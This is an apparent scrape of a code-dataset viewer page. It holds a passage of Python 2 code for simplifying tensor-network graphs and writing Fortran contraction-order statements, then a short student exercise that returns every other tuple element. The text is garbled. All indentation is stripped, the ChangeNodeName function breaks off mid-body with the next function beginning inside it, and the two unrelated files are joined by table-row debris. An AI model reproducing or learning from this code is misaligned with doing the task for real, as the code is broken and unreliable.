nng[k] = ng[k]
else:
nng[k] = ng[k]
nk = []
for k in nng.keys():
ks,e = k.split("_",1)
if ks == "O":
nk.append(k)
nk.sort(cmp)
i = 0
l = len(nk)
gv = {}
ov = [(0,0)]*2*l
for k in nk:
i+= 1
nv = [("OO", i,), ("OO", i+l)]
gv[k] = nv
ov[i-1] = (k, 1)
ov[i+l-1] = (k,2)
gv["OO"] = ov
return Add_Graph(gv, nng)
def cmp(k1,k2):
k,e1 = k1.split("_",1)
e1 = int(e1)
k,e2 = k2.split("_",1)
e2 = int(e2)
return e1-e2
def Simplify_Graph_W3(g):
# ng = Simplify_Graph_U(g)
ng = g
I_V = set([])
for k in ng.keys():
ks,s = k.split("_",1)
if (ks == "W"):
kp = "Wp_"+s
k1,e1 = ng[k][0]
k2,e2 = ng[k][1]
k3,e3 = ng[k][2]
if (k1==kp) and (e1==2) and (k2==kp) and \
(e2==3) and (k3==kp) and (e3==4):
I_V.add(k)
for k in I_V:
ks,s = k.split("_",1)
kp = "Wp_"+s
Is = "I_"+s
gv = {
k:[(kp,2), (kp,3), (kp, 4), (Is, 2)],
kp:[(Is,1), (k,1), (k,2), (k, 3)],
Is:[(kp,1), (k,4)]
}
ng = Add_Graph(gv, ng)
ng = Simplify_Graph_I(ng)
return ng
def Simplify_Graph_W4(g):
# ng = Simplify_Graph_U(g)
ng = g
I_V = set([])
for k in ng.keys():
ks,s = k.split("_",1)
if (ks == "W"):
kp = "Wp_"+s
k1,e1 = ng[k][0]
k2,e2 = ng[k][1]
k3,e3 = ng[k][2]
k4,e4 = ng[k][3]
if (k1==kp) and (e1==2) and (k2==kp) and \
(e2==3) and (k3==kp) and (e3==4) and \
(k4==kp) and (e4==5):
I_V.add(k)
for k in I_V:
ks,s = k.split("_",1)
kp = "Wp_"+s
Is = "I_"+s
gv = {
k:[(kp,2), (kp,3), (kp, 4), (kp, 5), (Is, 2)],
kp:[(Is,1), (k,1), (k,2), (k, 3), (k,4)],
Is:[(kp,1), (k,5)]
}
ng = Add_Graph(gv, ng)
ng = Simplify_Graph_I(ng)
return ng
def Simplify_Graph_W1(g):
ng = g
I_V = set([])
for k in ng.keys():
ks,s = k.split("_",1)
if (ks == "W1"):
kp = "W1p_"+s
k1,e1 = ng[k][0]
k2,e2 = ng[k][1]
if (k1==kp) and (e1==2) and (k2==kp) and (e2==3):
I_V.add(k)
for k in I_V:
ks,s = k.split("_",1)
kp = "W1p_"+s
Is = "I_"+s
gv = {
k:[(kp,2), (kp,3), (Is, 2)],
kp:[(Is,1), (k,1), (k,2)],
Is:[(kp,1), (k,3)]
}
ng = Add_Graph(gv, ng)
ng = Simplify_Graph_I(ng)
return ng
def Simplify_Graph_W2(g):
ng = g
I_V = set([])
for k in ng.keys():
ks,s = k.split("_",1)
if (ks == "W2"):
kp = "W2p_"+s
k1,e1 = ng[k][0]
k2,e2 = ng[k][1]
if (k1==kp) and (e1==2) and (k2==kp) and (e2==3):
I_V.add(k)
for k in I_V:
ks,s = k.split("_",1)
kp = "W2p_"+s
Is = "I_"+s
gv = {
k:[(kp,2), (kp,3), (Is, 2)],
kp:[(Is,1), (k,1), (k,2)],
Is:[(kp,1), (k,3)]
}
ng = Add_Graph(gv, ng)
ng = Simplify_Graph_I(ng)
return ng
def Simplify_Graph_W(g):
# ng = Simplify_Graph_U(g)
ng = g
I_V = set([])
for k in ng.keys():
ks,s = k.split("_",1)
if (ks == "W"):
kp = "Wp_"+s
k1,e1 = ng[k][0]
k2,e2 = ng[k][1]
if (k1==kp) and (e1==2) and (k2==kp) and (e2==3):
I_V.add(k)
for k in I_V:
ks,s = k.split("_",1)
kp = "Wp_"+s
Is = "I_"+s
gv = {
k:[(kp,2), (kp,3), (Is, 2)],
kp:[(Is,1), (k,1), (k,2)],
Is:[(kp,1), (k,3)]
}
ng = Add_Graph(gv, ng)
ng = Simplify_Graph_I(ng)
return ng
def Simplify_Graph_U(g):
# ng = Simplify_Graph_V(g)
ng = g
I_V = set([])
for k in ng.keys():
ks,s = k.split("_",1)
if (ks == "U"):
kp = "Up_"+s
k1,e1 = ng[k][0]
k2,e2 = ng[k][1]
if (k1==kp) and (e1==3) and (k2==kp) and (e2==4):
I_V.add(k)
for k in I_V:
ks,s = k.split("_",1)
kp = "Up_"+s
I1s = "I1_"+s
I2s = "I2_"+s
gv = {
k:[(kp,3), (kp,4), (I1s, 2), (I2s,2)],
kp:[(I1s,1), (I2s,1), (k,1), (k,2)],
I1s:[(kp,1), (k,3)],
I2s:[(kp,2), (k,4)]
}
ng = Add_Graph(gv, ng)
ng = Simplify_Graph_I(ng)
return ng
def Simplify_Graph_V(g):
# ng = Simplify_Graph_I(g)
ng = g
I_V = set([])
for k in ng.keys():
ks,s = k.split("_",1)
if (ks == "V"):
kp = "Vp_"+s
k1,e1 = ng[k][0]
k2,e2 = ng[k][1]
if (k1==kp) and (e1==2) and (k2==kp) and (e2==3):
I_V.add(k)
for k in I_V:
ks,s = k.split("_",1)
kp = "Vp_"+s
Is = "I_"+s
gv = {
k:[(kp,2), (kp,3), (Is, 2)],
kp:[(Is,1), (k,1), (k,2)],
Is:[(kp,1), (k,3)]
}
ng = Add_Graph(gv, ng)
ng = Simplify_Graph_I(ng)
return ng
def print_graph(g, prefix=""):
keys = g.keys()
keys.sort()
for k in keys:
print prefix, k, g[k]
def Simplify_Graph_I(g):
keys = set(g.keys())
I_keys = set([])
for k in keys:
if k[0] == "I":
I_keys.add(k)
ng = {}
for k in keys - I_keys:
nv = []
for v in g[k]:
if (v[0] not in I_keys):
nv.append(v)
else:
e = v[1]-1
if (e==0): e = 1
else: e = 0
nv.append(g[v[0]][e])
ng[k] = nv
return ng
def Break_Graph(g):
keys = set(g.keys())
key_class = []
while (len(keys)>0):
kp = set([])
kc = set([])
k = keys.pop()
kp.add(k)
while (len(kp) > 0):
k = kp.pop()
kc.add(k)
for v in g[k]:
if (v[0] not in kc):
kp.add(v[0])
keys.discard(v[0])
key_class.append(kc)
gs = []
for kc in key_class:
ng = {}
for k in kc:
ng[k] = g[k]
gs.append(ng)
return gs
# for kc in key_class:
# print kc
# print
# for v in g[k]:
# kc.add(v[0])
# keys.discard(v[0])
def ChangeNodeName(g):
ng = {}
if g.has_key('OO') and len(g['OO']) == 6:
for k in g.keys():
nvs = []
for v in g[k]:
if v[0] == "OO":
nv = ""
def add_graph(gx1, gx2):
k1s = gx1.keys()
k1s.sort()
gx3 = {}
k2s = gx2.keys()
k2s.sort()
for k2 in k2s:
gx3[k2+100] = []
for v in gx2[k2]:
gx3[k2+100].append((v[0]+100, v[1]))
k3s = gx3.keys()
k3s.sort()
k1_link = k1s[-1]
k3_link = k3s[-2]
gx4 = {}
for k1 in k1s:
if k1 == k1_link:
continue
else:
gx4[k1] = []
for n,e in gx1[k1]:
if n != k1_link:
gx4[k1].append((n,e))
else:
nn,ee = gx3[k3_link][e-1]
gx4[k1].append((nn,ee))
for k3 in k3s:
if k3 == k3_link:
continue
else:
gx4[k3] = []
for n,e in gx3[k3]:
if n != k3_link:
gx4[k3].append((n,e))
else:
nn, ee = gx1[k1_link][e-1]
gx4[k3].append((nn,ee))
return gx4
def get_path_cost(gx, pr=False):
ge,gm=GC2GE(gx)
graph = gnode(gm)
ks = graph.keys()
ks.sort()
for k in ks:
graph[k].sort()
max_leg = 1000; max_comp = 10000
max_cost = 1e200
for i in xrange(0,len(ks)):
for j in xrange(i+1, len(ks)):
start = ks[i]; end = ks[j]
paths=find_all_path_pool(graph,start,end)
for p in paths:
leg,comp,cost=contract_gmera(gm, p)#, True)
if leg < 0:
print 'error contracting'
sys.exit(-1)
if (cost < max_cost):
max_leg = leg
max_comp = comp
path = p
max_cost = cost
if pr: print leg, comp, p, cost
if (cost == max_cost):
if (leg < max_leg):
max_leg = leg
path = p
if pr: print leg, comp, p, cost
# if (comp == max_comp):
# if (leg < max_leg):
# max_leg = leg
# path = p
# elif (comp < max_comp):
# max_leg = leg
# max_comp = comp
# path = p
# if (leg<=max_leg and comp<=max_comp):
# if pr: print leg, comp, p, cost
return max_leg, max_comp, path, max_cost
def Output_Fortran(ii, Gname, Oname, gg, jj=-1):
ge,gm = GC2GE(gg)
gm_nodes = {}
j = 0
ks = gm.keys()
for k in ks:
j += 1
name=k.split("_",1)[0]
gm_nodes[k] = j
order = []
leg,comp, path, cost=get_path_cost(gg)#,pr=True)
for k in path:
order.append(gm_nodes[k])
print_graph(gg, "!!$ ")
if jj < 0:
print " %s(%d)%%nNode=%d" % (Gname, ii,len(ks))
print " %s(%d)%%Nodes=-1" % (Gname, ii)
print " %s(%d)%%Edges=-1" % (Gname, ii)
else:
print " %s(%d,%d)%%nNode=%d" % (Gname, ii,jj,len(ks))
print " %s(%d,%d)%%Nodes=-1" % (Gname, ii,jj)
print " %s(%d,%d)%%Edges=-1" % (Gname, ii,jj)
j = 0
for k in ks:
j=j+1
name=k.split("_",1)[0]
edges = ",".join([str(x) for x in gm[k]])
leng = len(gm[k])
if (name == "OO" and leng == 6): name = "OOO"
if (name == "OO" and leng == 2): name = "O"
if (name == "oo" and leng == 6): name = "ooo"
if jj < 0:
print ''' %s(%d)%%Names(%d)="%s" !%s''' % (Gname, ii,j, name, k)
print " %s(%d)%%Nodes(%d)=%d" % (Gname, ii,j,leng)
print " %s(%d)%%Edges(1:%d,%d)=(/%s/)" % (Gname, ii,leng,j,edges)
else:
print ''' %s(%d,%d)%%Names(%d)="%s" !%s''' % (Gname, ii,jj,j, name, k)
print " %s(%d,%d)%%Nodes(%d)=%d" % (Gname, ii,jj,j,leng)
print " %s(%d,%d)%%Edges(1:%d,%d)=(/%s/)" % (Gname, ii,jj,leng,j,edges)
print "!$$ %d/%d %20.14G" % (leg,comp, cost)
if jj<0:
print " %s(1:%d, %d)=(/%s/)" % (Oname, len(ks), ii,
",".join([str(x) for x in order]))
else:
print " %s(1:%d, %d,%d)=(/%s/)" % (Oname, len(ks), ii, jj,
",".join([str(x) for x in order]))
print
oo1_tmpl = """{
"oo_%(1)s":[("I_%(1)s",1), ("I_%(1)s", 2)],
"I_%(1)s":[("oo_%(1)s", 1), ("oo_%(1)s", 2)]
}"""
oo2_tmpl = """{
"oo_%(1)s_%(2)s":[("I_%(1)s",1), ("I_%(2)s", 1), ("I_%(1)s", 2), ("I_%(2)s", 2)],
"I_%(1)s":[("oo_%(1)s_%(2)s", 1), ("oo_%(1)s_%(2)s", 3)],
"I_%(2)s":[("oo_%(1)s_%(2)s", 2), ("oo_%(1)s_%(2)s", 4)]
}
"""
oo2_Ntmpl = """{
"%(name)s_%(1)s_%(2)s":[("I_%(1)s",1), ("I_%(2)s", 1), ("I_%(1)s", 2), ("I_%(2)s", 2)],
"I_%(1)s":[("%(name)s_%(1)s_%(2)s", 1), ("%(name)s_%(1)s_%(2)s", 3)],
"I_%(2)s":[("%(name)s_%(1)s_%(2)s", 2), ("%(name)s_%(1)s_%(2)s", 4)]
}
"""
oo3_tmpl = """{
"oo_%(1)s_%(2)s_%(3)s":[("I_%(1)s",1), ("I_%(2)s",1), ("I_%(3)s",1),
("I_%(1)s",2), ("I_%(2)s",2), ("I_%(3)s",2)],
"I_%(1)s":[("oo_%(1)s_%(2)s_%(3)s",1), ("oo_%(1)s_%(2)s_%(3)s",4)],
"I_%(2)s":[("oo_%(1)s_%(2)s_%(3)s",2), ("oo_%(1)s_%(2)s_%(3)s",5)],
"I_%(3)s":[("oo_%(1)s_%(2)s_%(3)s",3), ("oo_%(1)s_%(2)s_%(3)s",6)]
}
"""
|
15,799 | 93f3b70d930f14f645b03e95b79c3be994e115bd | def oddTuples(aTup):
'''
aTup: a tuple
returns: tuple, every other element of aTup.
'''
# Your Code Here
g = ()
for i in range(len(aTup)):
if i%2 != 0:
print i
continue
else:
g = g + (aTup[i],)
print "g " , g
return g
print oddTuples((4, 15, 4, 5, 2, 15, 7, 20)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.